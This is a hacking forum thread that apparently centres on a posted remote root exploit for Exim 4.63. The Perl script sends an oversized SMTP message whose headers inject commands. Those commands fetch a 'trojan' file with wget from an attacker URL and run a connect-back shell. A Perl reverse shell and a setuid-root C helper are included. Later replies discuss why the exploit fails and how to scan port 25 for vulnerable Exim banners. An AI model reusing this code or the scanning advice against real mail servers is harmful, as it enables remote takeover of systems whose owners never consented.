Jump to content
pyth0n3

Exim 4.63 Remote Exploit

Recommended Posts

Posted

#Exim 4.63 (RedHat/Centos/Debian) Remote Root Exploit by Kingcope
#Modified perl version of metasploit module

=for comment

use this connect back shell as "trojanurl" and be sure to setup a netcat,

---snip---

$system = '/bin/sh';
$ARGC=@ARGV;
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");

open FILE, ">/var/spool/exim4/s.c";
print FILE qq{
#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
setuid(0);
setgid(0);
setgroups(0, NULL);
execl("/bin/sh", "sh", NULL);
}
};
close FILE;

system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c");
open FILE, ">/tmp/e.conf";
print FILE "spool_directory = \${run{/bin/chown root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /var/spool/exim4/s}}";
close FILE;

system("exim -C/tmp/e.conf -q; rm /tmp/e.conf");
system("uname -a;");
system("/var/spool/exim4/s");
system($system);

---snip---

=cut

use IO::Socket;

if ($#ARGV ne 3) {
print "./eximxpl <host/ip> <trojanurl> <yourip> <yourport>\n";
print "example: ./eximxpl utoronto.edu http://www.h4x.net/shell.txt 3.1.33.7 443\n";
exit;
}

$|=1;

$trojan = $ARGV[1];
$myip = $ARGV[2];
$myport = $ARGV[3];
$helohost = "abcde.com";

$max_msg = 52428800;

my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "25",
Proto => 'tcp');

while(<$sock>) {
print;
if ($_ =~ /220 /) { last;}
}

print $sock "EHLO $helohost\r\n";
while(<$sock>) {
print;
if ($_ =~ /250-SIZE (\d+)/) {
$max_msg = $1;
print "Set size to $max_msg !\n";
}
if ($_ =~ /^250.*Hello ([^\s]+) \[([^\]]+)\]/) {
$revdns = $1;
$saddr = $2;
}
if ($_ =~ /250 /) { last;}
}

if ($revdns eq $helohost) {
$vv = "";
} else {
$vv = $revdns. " ";
}

$vv .= "(" . $helohost . ")";

$from = "root\@local.com";
$to = "postmaster\@localhost";

$msg_len = $max_msg + 1024*256;
$logbuffer_size = 8192;

$logbuffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <$from> H=$vv [$saddr]: message too big: read=$msg_len max=$max_msg\n";
$logbuffer .= "Envelope-from: <$from>\nEnvelope-to: <$to>\n";

$filler = "V" x (8 * 16);
$logbuffer_size -= 3;

for ($k=0;$k<60;$k++) {
if (length($logbuffer) >= $logbuffer_size) {last;}
$hdr = sprintf("Header%04d: %s\n", $k, $filler);
$newlen = length($logbuffer) + length($hdr);
if ($newlen > $logbuffer_size) {
$newlen -= $logbuffer_size;
$off = length($hdr) - $newlen - 2 - 1;
$hdr = substr($hdr, 0, $off);
$hdr .= "\n";
}
$hdrs .= $hdr;
$logbuffer .= " " . $hdr;
}

$hdrx = "HeaderX: ";
$k2 = 3;
for ($k=1;$k<=200;$k++) {
if ($k2 > 12) {
$k2 = 3;
}
# $hdrx .= "\${run{/bin/sh -c 'exec /bin/sh -i <&$k2 >&0 2>&0'}} ";
$hdrx .= "\${run{/bin/sh -c \"exec /bin/sh -c 'wget $trojan -O /tmp/c.pl;perl /tmp/c.pl $myip $myport; sleep 10000000'\"}} ";
$k2++;
}

$v = "A" x 255 . "\n";
$body = "";
while (length($body) < $msg_len) {
$body .= $v;
}

$body = substr($body, 0, $msg_len);

print $sock "MAIL FROM: <$from>\r\n";
$v = <$sock>;
print $v;
print $sock "RCPT TO: <$to>\r\n";
$v = <$sock>;
print $v;
print $sock "DATA\r\n";
$v = <$sock>;
print $v;

print "Sending large buffer, please wait...\n";

print $sock $hdrs;
print $sock $hdrx . "\n";
print $sock $body;
print $sock "\r\n.\r\n";
$v = <$sock>;
print $v;
print $sock "MAIL FROM: <$from>\r\n";
$v = <$sock>;
print $v;
print $sock "RCPT TO: <$to>\r\n";

while(1){};

Source:

FullDisclosure

Note:

All debian distribution run exim4 by default

Debian: 2131-1: exim4: arbitrary code execution

  • Upvote 1
Posted

just tried on centos - it's not work =(

250-SIZE 52428800

Set size to 52428800 !

250-PIPELINING

250-STARTTLS

250 HELP

250 OK

250 Accepted

354 Enter message, ending with "." on a line by itself

Sending large buffer, please wait...

552 Message size exceeds maximum permitted

250 OK

maybe because "552 Message size exceeds maximum permitted"??

Posted (edited)
ma poate ajuta/ imi poate spune .. cineva cum pot face un scanner din exploitul acesta si.. pe ce port scanez?:D va rog dati-mi un email la cute.remus [at] yahoo.com

Se poate scrie un script în oricare limbaj de programare care sa execute un scan de tipul choose random sau range targets pe portul 25

Bineîn?eles va trebui sa fac? ?i un service version detection , dup? care vine creat un filtru in asa fel încît vin salvate doar target-urile care con?in ca banner ( Exim smtpd 4) ?i unde porturile sunt bineîn?eles în open state (op?iunile filtered sau closed nu trebuie sa fie luate în considerare de c?tre filtru creat )

P.S. Presupun ca compania în care lucrezi ?i-a cerut asa ceva pt pentesting

Edited by pyth0n3
Posted
mie imi trebuie acel service version detection :-? oare exista un download? sau are cineva? multumesc anticipat.

man nmap 

  -sV: Probe open ports to determine service/version info

P.S. Presupun ca în compania în care lucrezi folosi?i nmap pt Network Discovery

Posted (edited)
Se poate scrie un script în oricare limbaj de programare care sa execute un scan de tipul choose random sau range targets pe portul 25

Bineîn?eles va trebui sa fac? ?i un service version detection , dup? care vine creat un filtru in asa fel încît vin salvate doar target-urile care con?in ca banner ( Exim smtpd 4) ?i unde porturile sunt bineîn?eles în open state (op?iunile filtered sau closed nu trebuie sa fie luate în considerare de c?tre filtru creat )

P.S. Presupun ca compania în care lucrezi ?i-a cerut asa ceva pt pentesting

good shit, multumim pentru toate informatile.

Edited by sTrEs
Posted (edited)

Careva imi poate face rost de #shell.txt# pe mine ma redirectioneaza pe alta pagina...sau ce`i shell.txt ? iti face sesiune connect back pt firewall/router?ms fain

Edited by mitzayapa
Posted
Careva imi poate face rost de #shell.txt# pe mine ma redirectioneaza pe alta pagina...sau ce`i shell.txt ? iti face sesiune connect back pt firewall/router?ms fain

Raspund la subiect :

shell.txt este un fisier de text deoarece are extensia .txt , acest fisier are numele de shell in acest caz

Oricine poate face rost de un fisier cu numele shell.txt , click dreapta si creezi acest fisier

Pentru alte amanunte, si pentru ceea ce vrei sa contina acest fisier esti liber sa pui intrebari , bineinteles daca se poate ia alta sectiune , spre exemplu AJUTOR deoarece aici esti off topic

Posted
just tried on centos - it's not work =(

250-SIZE 52428800

Set size to 52428800 !

250-PIPELINING

250-STARTTLS

250 HELP

250 OK

250 Accepted

354 Enter message, ending with "." on a line by itself

Sending large buffer, please wait...

552 Message size exceeds maximum permitted

250 OK

maybe because "552 Message size exceeds maximum permitted"??

Si la mine da exact la fel ;-|

Posted
Si la mine da exact la fel ;-|

Probabil din cauza ca:


[B]$msg_len = $max_msg + 1024*256;
$logbuffer_size = 8192;[/B]

$logbuffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <$from> H=$vv [$saddr]: message too big: read=$msg_len max=$max_msg\n";
$logbuffer .= "Envelope-from: <$from>\nEnvelope-to: <$to>\n";

Este patchuit si nu poate scrie mai mult decat este nevoie, ceva in genul la BoF. So...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...